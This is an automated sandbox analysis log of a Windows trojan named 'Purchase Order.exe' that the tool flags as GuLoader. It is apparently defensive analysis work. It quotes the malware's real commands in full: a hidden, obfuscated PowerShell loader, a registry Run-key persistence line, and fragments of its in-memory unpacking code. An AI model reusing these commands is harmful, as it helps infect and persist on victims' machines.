            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004048C50_2_004048C5
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004064CB0_2_004064CB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00406CA20_2_00406CA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0446F0102_2_0446F010
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0446F8E02_2_0446F8E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0446ECC82_2_0446ECC8
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_004048C57_2_004048C5
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_004064CB7_2_004064CB
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00406CA27_2_00406CA2
            Source: Purchase Order.exeStatic PE information: invalid certificate
            Source: Purchase Order.exe, 00000000.00000000.1953885414.0000000000449000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegenanvendelsesprojekters shuntens.exeDVarFileInfo$ vs Purchase Order.exe
            Source: Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
            Source: classification engineClassification label: mal100.troj.evad.winEXE@13/12@4/3
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_0040310F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\potentiallyJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeMutant created: \Sessions\1\BaseNamedObjects\-2MBZMJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsrA3F.tmpJump to behavior
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order.exeVirustotal: Detection: 20%
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb@ source: powershell.exe, 00000002.00000002.2751700296.0000000008327000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5SEA source: powershell.exe, 00000002.00000002.2746093793.0000000002B78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2749734497.000000000721D000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Glaciated $Uddeligheds $Overfldigstes), (Nonvirulent @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Zogo = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hallooed)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Samdeling, $false).DefineType($Blaffe, $Omniparo
            Obfuscated command line found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AnnouncesJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AnnouncesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
